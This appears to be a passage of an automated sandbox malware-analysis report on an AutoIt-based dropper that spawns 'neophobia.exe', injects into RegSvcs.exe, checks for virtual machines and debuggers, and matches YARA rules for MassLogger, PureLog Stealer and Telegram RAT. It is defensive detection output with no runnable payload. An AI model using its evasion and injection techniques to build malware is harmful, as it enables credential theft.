Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 2352, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 6840, type: MEMORYSTR

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\AppData\Local\scrolar\neophobia.exe	API/Special instruction interceptor: Address: 12F3FBC
Source: C:\Users\user\AppData\Local\scrolar\neophobia.exe	API/Special instruction interceptor: Address: 1759594
Source: C:\Users\user\AppData\Local\scrolar\neophobia.exe	API/Special instruction interceptor: Address: 184A2CC
Source: C:\Users\user\AppData\Local\scrolar\neophobia.exe	API/Special instruction interceptor: Address: 115EB64

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: 7_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,

7_2_004019F0

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: C:\Users\user\AppData\Local\scrolar\neophobia.exe

Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes

Source: C:\Users\user\Desktop\7b4Iaf58Rp.exe	API coverage: 4.5 %
Source: C:\Users\user\AppData\Local\scrolar\neophobia.exe	API coverage: 4.8 %

Source: C:\Users\user\Desktop\7b4Iaf58Rp.exe	Code function: 0_2_00FF445A GetFileAttributesW,FindFirstFileW,FindClose,	0_2_00FF445A
Source: C:\Users\user\Desktop\7b4Iaf58Rp.exe	Code function: 0_2_00FFC6D1 FindFirstFileW,FindClose,	0_2_00FFC6D1
Source: C:\Users\user\Desktop\7b4Iaf58Rp.exe	Code function: 0_2_00FFC75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	0_2_00FFC75C
Source: C:\Users\user\Desktop\7b4Iaf58Rp.exe	Code function: 0_2_00FFEF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00FFEF95
Source: C:\Users\user\Desktop\7b4Iaf58Rp.exe	Code function: 0_2_00FFF0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00FFF0F2
Source: C:\Users\user\Desktop\7b4Iaf58Rp.exe	Code function: 0_2_00FFF3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_00FFF3F3
Source: C:\Users\user\Desktop\7b4Iaf58Rp.exe	Code function: 0_2_00FF37EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00FF37EF
Source: C:\Users\user\Desktop\7b4Iaf58Rp.exe	Code function: 0_2_00FF3B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00FF3B12
Source: C:\Users\user\Desktop\7b4Iaf58Rp.exe	Code function: 0_2_00FFBCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_00FFBCBC
Source: C:\Users\user\AppData\Local\scrolar\neophobia.exe	Code function: 2_2_00DA445A GetFileAttributesW,FindFirstFileW,FindClose,	2_2_00DA445A
Source: C:\Users\user\AppData\Local\scrolar\neophobia.exe	Code function: 2_2_00DAC6D1 FindFirstFileW,FindClose,	2_2_00DAC6D1
Source: C:\Users\user\AppData\Local\scrolar\neophobia.exe	Code function: 2_2_00DAC75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	2_2_00DAC75C
Source: C:\Users\user\AppData\Local\scrolar\neophobia.exe	Code function: 2_2_00DAEF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	2_2_00DAEF95
Source: C:\Users\user\AppData\Local\scrolar\neophobia.exe	Code function: 2_2_00DAF0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	2_2_00DAF0F2
Source: C:\Users\user\AppData\Local\scrolar\neophobia.exe	Code function: 2_2_00DAF3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	2_2_00DAF3F3
Source: C:\Users\user\AppData\Local\scrolar\neophobia.exe	Code function: 2_2_00DA37EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	2_2_00DA37EF
Source: C:\Users\user\AppData\Local\scrolar\neophobia.exe	Code function: 2_2_00DA3B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	2_2_00DA3B12
Source: C:\Users\user\AppData\Local\scrolar\neophobia.exe	Code function: 2_2_00DABCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	2_2_00DABCBC

Source: C:\Users\user\Desktop\7b4Iaf58Rp.exe

Code function: 0_2_00F949A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_00F949A0

Source: wscript.exe, 00000009.00000002.1602486630.000001BFCB2D4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: neophobia.exe, 00000004.00000003.1495591783.0000000001554000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: vmwareworkstation.exe]
Source: neophobia.exe, 00000006.00000003.1531646365.0000000001644000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: vmwareworkstation.exei
Source: RegSvcs.exe, 00000007.00000002.2662898160.000000000128A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll*
Source: neophobia.exe, 0000000A.00000002.1648966763.0000000001079000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: vmwareworkstation.exe
Source: RegSvcs.exe, 0000000B.00000002.2662801382.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: 7b4Iaf58Rp.exe, 00000000.00000003.1416024801.0000000000AC4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: vmwareworkstation.exep

Source: C:\Users\user\Desktop\7b4Iaf58Rp.exe	API call chain: ExitProcess graph end node	graph_0-104419
Source: C:\Users\user\AppData\Local\scrolar\neophobia.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\scrolar\neophobia.exe	API call chain: ExitProcess graph end node
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	API call chain: ExitProcess graph end node

Source: C:\Users\user\Desktop\7b4Iaf58Rp.exe

Code function: 0_2_01003F09 BlockInput,

0_2_01003F09

Source: C:\Users\user\Desktop\7b4Iaf58Rp.exe

Code function: 0_2_00F93B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_00F93B3A

Source: C:\Users\user\Desktop\7b4Iaf58Rp.exe

Code function: 0_2_00FC5A7C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

0_2_00FC5A7C

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

7_2_004019F0

Source: C:\Users\user\Desktop\7b4Iaf58Rp.exe

Code function: 0_2_00F94B37 LoadLibraryA,GetProcAddress,

0_2_00F94B37

Source: C:\Users\user\Desktop\7b4Iaf58Rp.exe	Code function: 0_2_00CCA0A0 mov eax, dword ptr fs:[00000030h]	0_2_00CCA0A0
Source: C:\Users\user\Desktop\7b4Iaf58Rp.exe	Code function: 0_2_00CCA100 mov eax, dword ptr fs:[00000030h]	0_2_00CCA100
Source: C:\Users\user\Desktop\7b4Iaf58Rp.exe	Code function: 0_2_00CC8A80 mov eax, dword ptr fs:[00000030h]	0_2_00CC8A80
Source: C:\Users\user\AppData\Local\scrolar\neophobia.exe	Code function: 2_2_012F4228 mov eax, dword ptr fs:[00000030h]	2_2_012F4228
Source: C:\Users\user\AppData\Local\scrolar\neophobia.exe	Code function: 2_2_012F4288 mov eax, dword ptr fs:[00000030h]	2_2_012F4288
Source: C:\Users\user\AppData\Local\scrolar\neophobia.exe	Code function: 2_2_012F2C08 mov eax, dword ptr fs:[00000030h]	2_2_012F2C08
Source: C:\Users\user\AppData\Local\scrolar\neophobia.exe	Code function: 4_2_01759860 mov eax, dword ptr fs:[00000030h]	4_2_01759860
Source: C:\Users\user\AppData\Local\scrolar\neophobia.exe	Code function: 4_2_017581E0 mov eax, dword ptr fs:[00000030h]	4_2_017581E0
Source: C:\Users\user\AppData\Local\scrolar\neophobia.exe	Code function: 4_2_01759800 mov eax, dword ptr fs:[00000030h]	4_2_01759800
Source: C:\Users\user\AppData\Local\scrolar\neophobia.exe	Code function: 6_2_0184A598 mov eax, dword ptr fs:[00000030h]	6_2_0184A598
Source: C:\Users\user\AppData\Local\scrolar\neophobia.exe	Code function: 6_2_01848F18 mov eax, dword ptr fs:[00000030h]	6_2_01848F18
Source: C:\Users\user\AppData\Local\scrolar\neophobia.exe	Code function: 6_2_0184A538 mov eax, dword ptr fs:[00000030h]	6_2_0184A538
Source: C:\Users\user\AppData\Local\scrolar\neophobia.exe	Code function: 10_2_0115EE30 mov eax, dword ptr fs:[00000030h]	10_2_0115EE30
Source: C:\Users\user\AppData\Local\scrolar\neophobia.exe	Code function: 10_2_0115D7B0 mov eax, dword ptr fs:[00000030h]	10_2_0115D7B0
Source: C:\Users\user\AppData\Local\scrolar\neophobia.exe	Code function: 10_2_0115EDD0 mov eax, dword ptr fs:[00000030h]	10_2_0115EDD0

Source: C:\Users\user\Desktop\7b4Iaf58Rp.exe

Code function: 0_2_00FE80A9 GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation,

0_2_00FE80A9

Source: C:\Users\user\Desktop\7b4Iaf58Rp.exe	Code function: 0_2_00FBA155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00FBA155
Source: C:\Users\user\Desktop\7b4Iaf58Rp.exe	Code function: 0_2_00FBA124 SetUnhandledExceptionFilter,	0_2_00FBA124
Source: C:\Users\user\AppData\Local\scrolar\neophobia.exe	Code function: 2_2_00D6A155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_00D6A155
Source: C:\Users\user\AppData\Local\scrolar\neophobia.exe	Code function: 2_2_00D6A124 SetUnhandledExceptionFilter,	2_2_00D6A124
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	7_2_0040CE09
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	7_2_0040E61C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	7_2_00416F6A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_004123F1 SetUnhandledExceptionFilter,	7_2_004123F1

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Maps a DLL or memory area into another process

Source: C:\Users\user\AppData\Local\scrolar\neophobia.exe	Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and write			Jump to behavior
Source: C:\Users\user\AppData\Local\scrolar\neophobia.exe	Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and write			Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\AppData\Local\scrolar\neophobia.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: FB8008			Jump to behavior
Source: C:\Users\user\AppData\Local\scrolar\neophobia.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 7A9008			Jump to behavior

Source: C:\Users\user\Desktop\7b4Iaf58Rp.exe

Code function: 0_2_00FE87B1 LogonUserW,

0_2_00FE87B1

Source: C:\Users\user\Desktop\7b4Iaf58Rp.exe

Code function: 0_2_00F93B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_00F93B3A

Source: C:\Users\user\Desktop\7b4Iaf58Rp.exe

Code function: 0_2_00F948D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,

0_2_00F948D7

Source: C:\Users\user\Desktop\7b4Iaf58Rp.exe

Code function: 0_2_00FF4C7F mouse_event,

0_2_00FF4C7F

Source: C:\Users\user\AppData\Local\scrolar\neophobia.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\7b4Iaf58Rp.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\scrolar\neophobia.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\scrolar\neophobia.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\scrolar\neophobia.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\scrolar\neophobia.exe"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\scrolar\neophobia.exe "C:\Users\user\AppData\Local\scrolar\neophobia.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\scrolar\neophobia.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\scrolar\neophobia.exe"	Jump to behavior

Source: C:\Users\user\Desktop\7b4Iaf58Rp.exe

Code function: 0_2_00FE7CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,

0_2_00FE7CAF

Source: C:\Users\user\Desktop\7b4Iaf58Rp.exe

Code function: 0_2_00FE874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

0_2_00FE874B

Source: 7b4Iaf58Rp.exe, neophobia.exe.0.dr	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: 7b4Iaf58Rp.exe, neophobia.exe	Binary or memory string: Shell_TrayWnd

Source: C:\Users\user\Desktop\7b4Iaf58Rp.exe

Code function: 0_2_00FB862B cpuid

0_2_00FB862B

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: GetLocaleInfoA,

7_2_00417A20

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\7b4Iaf58Rp.exe

Code function: 0_2_00FC4E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_00FC4E87

Source: C:\Users\user\Desktop\7b4Iaf58Rp.exe

Code function: 0_2_00FD1E06 GetUserNameW,

0_2_00FD1E06

Source: C:\Users\user\Desktop\7b4Iaf58Rp.exe

Code function: 0_2_00FC3F3A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,

0_2_00FC3F3A

Source: C:\Users\user\Desktop\7b4Iaf58Rp.exe

Code function: 0_2_00F949A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_00F949A0

Source: C:\Users\user\Desktop\7b4Iaf58Rp.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected MassLogger RAT

Source: Yara match	File source: 11.2.RegSvcs.exe.391e790.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.RegSvcs.exe.38f6458.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.RegSvcs.exe.2591b9e.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.RegSvcs.exe.391e790.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.RegSvcs.exe.2591b9e.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.RegSvcs.exe.38f5570.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.RegSvcs.exe.2590cb6.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.RegSvcs.exe.2590cb6.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.RegSvcs.exe.38f6458.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.5710000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.5710000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.RegSvcs.exe.38f5570.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000002.2666782183.00000000038F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2663292675.0000000002550000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2664119117.0000000002752000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2667760848.0000000005710000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 2352, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 6840, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: 11.2.RegSvcs.exe.391e790.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.RegSvcs.exe.38f6458.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.RegSvcs.exe.2591b9e.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.RegSvcs.exe.391e790.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.RegSvcs.exe.2591b9e.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.RegSvcs.exe.38f5570.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.RegSvcs.exe.2590cb6.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.RegSvcs.exe.2590cb6.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.RegSvcs.exe.38f6458.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.5710000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.5710000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.RegSvcs.exe.38f5570.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000002.2666782183.00000000038F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2663292675.0000000002550000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2667760848.0000000005710000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2664119117.0000000002763000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 11.2.RegSvcs.exe.391e790.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.RegSvcs.exe.38f6458.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.RegSvcs.exe.2591b9e.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.RegSvcs.exe.391e790.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.RegSvcs.exe.2591b9e.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.RegSvcs.exe.38f5570.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.RegSvcs.exe.2590cb6.1.raw.unpack, type: UNPACKEDPE
